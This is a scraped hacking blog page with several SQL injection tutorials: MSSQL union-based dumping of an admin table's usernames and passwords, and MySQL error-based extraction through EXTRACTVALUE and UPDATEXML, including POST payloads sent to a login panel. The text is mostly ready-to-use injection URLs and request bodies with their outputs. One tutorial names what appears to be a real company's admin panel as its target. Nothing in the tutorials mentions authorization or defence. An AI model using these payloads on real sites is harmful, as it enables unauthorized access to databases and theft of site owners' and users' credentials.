<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjToJmKHCmwHf8CsmDQDyoQMc4wMxrzHt1KJlTrL0XjjGhf823LoEtlCLMFeaFC66p7gSKjTZxvMvesP7hVlB-uR2MIY169QOZ683up-UGIwHP9XJcHTunJVWCGthfq9qDmP2PfXhUmpb4c/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjToJmKHCmwHf8CsmDQDyoQMc4wMxrzHt1KJlTrL0XjjGhf823LoEtlCLMFeaFC66p7gSKjTZxvMvesP7hVlB-uR2MIY169QOZ683up-UGIwHP9XJcHTunJVWCGthfq9qDmP2PfXhUmpb4c/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+9.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So <b>Admin</b> is the first table name here. To get the other tables, use this query:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 1=2 UNION SELECT
1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables <span style="color: red;">where table_name not in ('<span style="color: lime;">admin</span>')</span>--+</b></span><br />
<span style="font-size: small;">In the <b>red part</b> we add the previous table name to get the next one. We keep doing this until we get the table we want.</span><br />
<span style="font-size: small;">Remember that the table names must be inside the round brackets and each enclosed in single quotes, as in this query:</span><br />
<span style="font-size: small;"><b><span style="color: red;">where table_name not in ('<span style="color: lime;">Previous_Table_name_1</span>','<span style="color: lime;">Previous_Table_name_2</span>')</span></b></span><br />
<span style="color: red; font-size: small;"><span style="color: black;">So let's execute this query to get the other tables in the database.</span></span><br />
<span style="font-size: small;">Here is our second table in the database:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx39EcI0qOWKSLJzZ-XxpIC5pUFD6dIoh1N2yhfP1yyyQxJwwe_izjlImXqzgCgjt0_8VuhYW3UL_r0GEpgRmE4sGHaYso6ScBxr0ACInBFOoV-fq_Gj0CdgSiIIcKiNe3RvYrzxDj-8ne/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx39EcI0qOWKSLJzZ-XxpIC5pUFD6dIoh1N2yhfP1yyyQxJwwe_izjlImXqzgCgjt0_8VuhYW3UL_r0GEpgRmE4sGHaYso6ScBxr0ACInBFOoV-fq_Gj0CdgSiIIcKiNe3RvYrzxDj-8ne/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+8.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now let's get the columns from the table. This will be our query for the columns:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT 1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=('admin')--+</b></span><br />
<span style="font-size: small;">After executing this query you can see the first column name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY9NwB14UbHtNiqfd1n3vHhMqAvnei8-Pad3q2b31h0v5gexkyED1KcNJeTrwXqnx3h_c1jypzkFFm4KVf0TIOqz1-0I2C6q__4Ih_VczZikKSrVqLT8V4EWrakQZiknUMKMBmI8sDA_PS/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY9NwB14UbHtNiqfd1n3vHhMqAvnei8-Pad3q2b31h0v5gexkyED1KcNJeTrwXqnx3h_c1jypzkFFm4KVf0TIOqz1-0I2C6q__4Ih_VczZikKSrVqLT8V4EWrakQZiknUMKMBmI8sDA_PS/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+11.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">This is the first column in that table. To get the other columns from the table, we use this query:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT
1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15 from
information_schema.columns where table_name=('admin') <span style="color: red;">and column_name not in ('emp_name')</span>--+</b></span><br />
<span style="font-size: small;">In the red part we add the previous column name to get the next one, as we did for the tables. Keep doing this until you get the column name you want.</span><br />
<span style="font-size: small;">So let's execute this query to get the other columns.</span><br />
<span style="font-size: small;">You can see the next column name printed there.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr5R3DFf_PTxmvMK4JhvLkZTemukUYn_P4HeDvqGZGuYTzmky1BDvqjHOoB1yu8TwFxkTpZbSKre2cEWSfWiEdhJEoi0C99G8gwC1rJOHOf9ZW6flFqYuBdXx-kVz-nYPexe3zyHNMGEw5/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr5R3DFf_PTxmvMK4JhvLkZTemukUYn_P4HeDvqGZGuYTzmky1BDvqjHOoB1yu8TwFxkTpZbSKre2cEWSfWiEdhJEoi0C99G8gwC1rJOHOf9ZW6flFqYuBdXx-kVz-nYPexe3zyHNMGEw5/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+12.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">Now that we have the column names, let's extract data from them. As we cannot use group_concat in MSSQL, we concatenate the columns with the <b>+ operator (URL-encoded as %2b)</b> and a separator in <b>single quotes</b>. So our final query for extracting data from the columns will be:</span><br />
<span style="font-size: small;"><b>http://www.AnySite.com/news.asp?id=10 and 0=1 UNION SELECT
1,2,3,4,user_name%2b' '%2buser_pass,6,7,8,9,10,11,12,13,14,15 from admin--+</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiud_yl3D23fUZhVsPYf0WiWGg-8eXpDCoUNJ5tTXBH8_Hnrz1_3FG2ECBMjQRyMVmnEYcppHvZmRC2l79B5aC-5SVszB4vOtYPyysnpK2BrQTRSirgo54WYvqwxZ7jgx1O3U79b2R4dUqy/s1600/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection -Step by Step Guide" border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiud_yl3D23fUZhVsPYf0WiWGg-8eXpDCoUNJ5tTXBH8_Hnrz1_3FG2ECBMjQRyMVmnEYcppHvZmRC2l79B5aC-5SVszB4vOtYPyysnpK2BrQTRSirgo54WYvqwxZ7jgx1O3U79b2R4dUqy/s400/MSSQL+Union+Based+Injection+-Step+by+Step+Guide+13.png" title="MSSQL Union Based Injection -Step by Step Guide" width="400" /></a></span></div>
<span style="font-size: small;">After executing the query you can see the username and password printed, as in the picture above.</span><br />
<span style="font-size: small;">You can follow the same procedure to extract data from other columns.</span><br />
<span style="color: #b4a7d6; font-size: small;">HAP<span style="color: #990000;">P</span></span><span style="color: #990000; font-size: small;">Y</span><span style="font-size: small;"> <span style="color: magenta;">INJE</span><span style="color: #e06666;">CTIN</span><span style="color: #bf9000;">G</span> <span style="color: #274e13;">!!</span></span><br />
<span style="font-size: small;">AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</span><br />
XPATH Injection in Login Panel (2015-07-17)<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhnMTH-58YrU55y48EjXzDfFp7s59e0oHLYCl6gKcY1t0ZzPzjigX7ODJcPlxrOr0UMuyXcPuwzsyQuYPevrdz6rt_aq8cAVHeAuZW6GwJkK1qWwVJdklviuSANL1LHOrJZ3psTab_rM4O/s1600/XPATH+Injection+in+login+panel+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhnMTH-58YrU55y48EjXzDfFp7s59e0oHLYCl6gKcY1t0ZzPzjigX7ODJcPlxrOr0UMuyXcPuwzsyQuYPevrdz6rt_aq8cAVHeAuZW6GwJkK1qWwVJdklviuSANL1LHOrJZ3psTab_rM4O/s1600/XPATH+Injection+in+login+panel+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection in Login Panel" /></a></span></div>
<span style="font-size: small;">In our previous tutorial we discussed <a href="http://www.raijee1337.blogspot.com/2015/07/bypassing-login-panel-with-sql-queries.html" target="_blank">Bypassing Login Panel With SQL Queries</a>.</span><br />
<span style="font-size: small;">But sometimes, when we find an SQL injection vulnerability in a login panel, the usual bypass queries do not give access. In such cases we inject the login panel with XPATH injection and dump the admin details from it.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So let's start our manual SQL injection. As we are injecting through POST parameters, we need the Live HTTP Headers add-on to resend the POST parameters to the login panel.</span><br />
<span style="font-size: small;">Here is the target site:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.almoayedgroup.com/admin</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now open Live HTTP Headers in Mozilla Firefox. As you can see, there are <b>username</b> and <b>password</b> boxes in the admin login panel. Enter some text there and click the <b>Log In</b> button.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioi94-uy7yAAVzdqjNpAP0w-LrSJuFGcgl1iTTnydCgFO-gxA3AKVpwI6tsyTeUf-B94Zj3aY05mAIGaNlw9s-cSmh2zK4zYNA6FdMkeCzgN5waym-ESsMimHYac6UA9hh2vbVbdySliC8/s1600/XPATH+Injection+in+Login+Panel+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioi94-uy7yAAVzdqjNpAP0w-LrSJuFGcgl1iTTnydCgFO-gxA3AKVpwI6tsyTeUf-B94Zj3aY05mAIGaNlw9s-cSmh2zK4zYNA6FdMkeCzgN5waym-ESsMimHYac6UA9hh2vbVbdySliC8/s400/XPATH+Injection+in+Login+Panel+1.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After clicking the <b>Log In</b> button, look for the POST parameters in Live HTTP Headers. Here is the POST request that we sent to the server.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVLybk2LWKEIowFqIlkRe5HWgu5xlkGaDT5oO_C3KFpnmmoK86Xn2WjBADcFxyQBA6KJhBzxXtsNPY4eVT5WF7qFoA5YvCltSHBLwwinCOalhXabBiAIFagqEzGRFMnhv5zxgMPSr78g_/s1600/XPATH+Injection+in+Login+Panel+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVLybk2LWKEIowFqIlkRe5HWgu5xlkGaDT5oO_C3KFpnmmoK86Xn2WjBADcFxyQBA6KJhBzxXtsNPY4eVT5WF7qFoA5YvCltSHBLwwinCOalhXabBiAIFagqEzGRFMnhv5zxgMPSr78g_/s400/XPATH+Injection+in+Login+Panel+3.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">From the picture above you can see that these are our POST request parameters:</span><br />
<span style="font-size: small;"><b>POST REQUEST:<span style="color: red;">user_id=raijee&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;">Now let's add a single quote ' after the user_id value, giving <b><span style="color: red;">user_id=raijee'</span></b>, to check whether the login panel is vulnerable to SQL injection. After adding the single quote, send the POST request to the server by clicking the Replay button.</span><br />
<span style="color: red; font-size: small;"><span style="color: black;">After sending the POST request to the server, it gives an SQL error!!</span></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41s4ehStIvsxeiQPnWO_lVv7EQhmu8E_38yDc4eRyuKyS0iBEBg_hATt-uJ1zl0f8E-akkx2h9sEUXllKkG-PSDbFldIuq6lPbgfuSHupbmx219tj5L3Br3cMdsOdaiZV8BUGgNU4r0eR/s1600/XPATH+Injection+in+Login+Panel+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41s4ehStIvsxeiQPnWO_lVv7EQhmu8E_38yDc4eRyuKyS0iBEBg_hATt-uJ1zl0f8E-akkx2h9sEUXllKkG-PSDbFldIuq6lPbgfuSHupbmx219tj5L3Br3cMdsOdaiZV8BUGgNU4r0eR/s400/XPATH+Injection+in+Login+Panel+4.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="color: black; font-size: small;">This means it is vulnerable to SQL injection. Let's count the columns to prepare our UNION based query, so we now send POST requests to the server to find the number of columns.</span><br />
<span style="color: red; font-size: small;"><span style="color: black;">This is our POST parameter with an ORDER BY clause added for counting the columns:</span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><b>POST REQUEST<span style="color: red;"><span style="color: black;">:</span></span></b></span></span><span style="font-size: small;"><b><span style="color: red;">user_id=raijee' order by 2%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><span style="color: red;"><span style="color: black;"> <b>It gives no error!!</b></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: red; font-size: small;"><span style="color: black;"><b>POST REQUEST<span style="color: red;"><span style="color: black;">:</span></span></b></span></span><span style="font-size: small;"><b><span style="color: red;">user_id=raijee' order by 5%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;">Again no error!!</span></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' order by 6%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><b>Here we got an error!!</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"><span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgwl4QcXXdoLPh3U1-24PaAPxfFpbDSviuNuQCaN_h3CQBl2V1Q49isA5f6w7hrVlYCfJ1iN2A8b5MoSZQM3N8jQD6BlPsblYls4lyS7QRdMs-1qT3s-3yeQyLrB5RmS8mGhEd9gI3ncc/s1600/XPATH+Injection+in+Login+Panel+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgwl4QcXXdoLPh3U1-24PaAPxfFpbDSviuNuQCaN_h3CQBl2V1Q49isA5f6w7hrVlYCfJ1iN2A8b5MoSZQM3N8jQD6BlPsblYls4lyS7QRdMs-1qT3s-3yeQyLrB5RmS8mGhEd9gI3ncc/s400/XPATH+Injection+in+Login+Panel+5.png" title="XPATH Injection in Login Panel" width="400" /></a></span></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Error: </b><span style="color: red;">Invalid query:Unknown column '6' in 'order clause'</span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;">So this means there are 5 columns in total. Now let's prepare our UNION based query and send a POST request to the server:</span></span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' and 0 union select 1,2,3,4,5%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;">But It doesn't Give us Any Output There.So now Let's Try XPATH Injection for injecting it.</span><br />
<span style="font-size: small;">Strictly this is still SQL injection: EXTRACTVALUE() and UPDATEXML() take an XPath expression, and when that expression is invalid MySQL echoes it back inside the "XPATH syntax error" message. Concatenating the value we want into that expression is what leaks it, so the technique needs a page that displays database errors. Either function works; here we read the version with extractvalue. Send this POST request:</span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;"><br /></span></span></span></span>
<br />
<span style="font-size: small;"><b>POST REQUEST:</b> <b><span style="color: red;">user_id=raijee' and extractvalue(0x3a,concat(0x3a,version()))%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;">The error message now carries the <b>VERSION</b>:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><span style="color: black;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueDk3uDFOtIaPrcrHv597O3WwBzS_OdPmkkTkQpBt7SUd-ZbxfgMy1AHLXDakZhJpSiUNjMPhmocuyIDC67Zu8IT1vvLXPEDwd3FiU_lD1NOW7p3_QkFcisVhoWjs3u_w9FDhrQUHAGgJ/s1600/XPATH+Injection+in+Login+Panel+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueDk3uDFOtIaPrcrHv597O3WwBzS_OdPmkkTkQpBt7SUd-ZbxfgMy1AHLXDakZhJpSiUNjMPhmocuyIDC67Zu8IT1vvLXPEDwd3FiU_lD1NOW7p3_QkFcisVhoWjs3u_w9FDhrQUHAGgJ/s400/XPATH+Injection+in+Login+Panel+6.png" title="XPATH Injection in Login Panel" width="400" /></a></b></span></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Invalid query: XPATH syntax error: ':<span style="color: red;">5.5.32-log</span>'</span><br />
<span style="font-size: small;">Next, list the tables of the current database. The subquery must return a single row, hence the LIMIT. Send this POST request:</span><br />
<span style="font-size: small;"><b>POST REQUEST:</b> <b><span style="color: red;">user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increment the LIMIT offset (limit 1,1, limit 2,1, ...) to read the remaining tables; once the offset runs past the last row the subquery returns NULL and the page loads without an error. Then fetch the columns of the table you are interested in with this query:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>POST REQUEST:</b> <b><span style="color: red;">user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='<span style="color: blue;">TABLE_NAME_HERE</span>' limit 0,1)))%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">With the column names known, the last step is to dump the data itself. As before, LIMIT keeps the subquery to one row (without it MySQL answers "Subquery returns more than 1 row" instead of data); step the offset to read the other rows.</span><br />
<span style="font-size: small;">So this is the FINAL QUERY:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>POST REQUEST:</b> <b><span style="color: red;">user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(<span style="color: blue;">COLUMN_NAME_HERE</span>) from <span style="color: blue;">TABLE_NAME_HERE</span> limit 0,1)))%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If you have not read the XPATH injection tutorials yet, read these first:</span><br />
<span style="font-size: small;"><b><span style="color: blue;"><a href="http://www.raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using Extractvalue</a></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: blue;"><a href="http://www.raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using UpdateXML</a></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </span></span></span></span><br />
<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-52295479917924773622015-07-15T09:53:00.000-07:002015-08-17T08:51:09.296-07:00XPATH Injection Using UPDATEXML<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQuw1vrGS90nrXLrGIcAaMwgZsiPt7OueFIX8ehK5VD5-laPeoxxxvutCAjQ9oQLxIP5q2cKv3EEJxsMv-X1frrOagzJ2z8f4nA9Vcf8IlYJZbAVH0IAaI0XOHOvmecqSFOeDJN1rEp7E/s1600/XPATH+Injection+Using+updatexml+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using UPDATEXML" border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQuw1vrGS90nrXLrGIcAaMwgZsiPt7OueFIX8ehK5VD5-laPeoxxxvutCAjQ9oQLxIP5q2cKv3EEJxsMv-X1frrOagzJ2z8f4nA9Vcf8IlYJZbAVH0IAaI0XOHOvmecqSFOeDJN1rEp7E/s320/XPATH+Injection+Using+updatexml+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection Using UPDATEXML" width="320" /></a></span></div>
<span style="font-size: small;">After the discussion of <a href="http://raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using ExtractValue</a>,</span><br />
<span style="font-size: small;">this tutorial covers the next part: the same XPATH injection technique using UPDATEXML.</span><br />
<span style="font-size: small;">Sites sit behind different firewalls and filters. Some block the string extractvalue in requests but let updatexml through; both functions raise the same XPATH syntax error, so updatexml is a drop-in replacement.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's start injecting manually. Suppose we have found an injectable parameter, run a UNION-based query and got no output; that is where error-based extraction with XPATH injection comes in.</span><br />
<span style="font-size: small;">For example, here is our UNION-based query:</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">If this query gives no output, or sometimes an error such as</span><br />
<span style="font-size: small;">"The used SELECT statements have a different number of columns"</span><br />
<span style="font-size: small;">we switch to XPATH injection to extract the database. It only needs the page to display MySQL errors, not to render our columns.</span><br />
<span style="font-size: small;">So let's get the version with an XPATH injection query built on UPDATEXML.</span><br />
<span style="font-size: small;">Our XPATH query will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>After executing the query we get this kind of output:</span><br />
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">VERSION_HERE</span>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now let's check the current database name. The query is:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> <b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">and we get this output:</span><br />
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">CURRENT_DATABASE_NAME_HERE</span>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now let's continue and list the tables in the current database.</span><br />
<span style="font-size: small;">The query for the tables (LIMIT keeps the subquery to one row, which a scalar context requires) is<b>:</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After executing the query we get this output<b>:</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">SOME_TABLE_NAME_HERE</span>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">XPATH injection returns one value per request, so increment the LIMIT offset to read the remaining tables in the current database.</span><br />
<span style="font-size: small;">After getting the tables, the next step is the columns of the target table.</span><br />
<span style="font-size: small;">Our query for the columns will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(column_name) from information_schema.columns where table_name=<span style="color: red;">'OUR_TABLE_NAME_HERE'</span> limit 0,1)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increment the LIMIT offset to read the other columns of the <b>targeted table.</b></span><br />
<span style="font-size: small;">After getting the columns, the FINAL part is to dump data from them.</span><br />
<span style="font-size: small;">Our FINAL query will be (again one row per request; step the LIMIT offset for the next row):</span><br />
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(<span style="color: red;">OUR_COLUMN_NAME_HERE</span>) from<span style="color: red;"> OUR_TABLE_NAME_HERE</span> limit 0,1)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: #783f04;">HAP</span><span style="color: #e06666;">PY</span> <span style="color: #93c47d;">INJ</span><span style="color: #ead1dc;">ECT</span><span style="color: #134f5c;">ING !!!</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: #134f5c;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><br /></b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-27166050643978527022015-07-14T10:35:00.001-07:002015-08-17T08:49:15.434-07:00XPATH Injection Using Extractvalue<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM83KkkWkxx-7NH_gH6Pe8KUbB9pGm22q6siEXNIPNxPHwVT1KNb3k6oDUE73BUYVc72BNWMLWQmXccbsJM96jPtgJT92JgrIQ5_-UrHH7of0WiYtlGc8hR9NgSl0lxaG2rEvzeuy5PjGt/s1600/XPATH+Injection+Using+Extractvalue+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM83KkkWkxx-7NH_gH6Pe8KUbB9pGm22q6siEXNIPNxPHwVT1KNb3k6oDUE73BUYVc72BNWMLWQmXccbsJM96jPtgJT92JgrIQ5_-UrHH7of0WiYtlGc8hR9NgSl0lxaG2rEvzeuy5PjGt/s320/XPATH+Injection+Using+Extractvalue+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection Using Extractvalue" width="320" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;">In this tutorial we will discuss XPATH injection using extractvalue.</span><br />
<span style="font-size: small;">While injecting a site we reach the UNION-based step, and when we execute the UNION query we get the error</span><br />
<span style="font-size: small;">"The used SELECT statements have a different number of columns"</span><br />
<span style="font-size: small;">so we use XPATH injection instead: MySQL's extractvalue() echoes an invalid XPath expression back in its error message, so anything we concatenate into that expression is displayed on the page.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Let's start our XPATH injection.</span><br />
<span style="font-size: small;">Here is a target; first find the version with XPATH.</span><br />
<span style="font-size: small;">So here is our query for the version:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))</b></span><br />
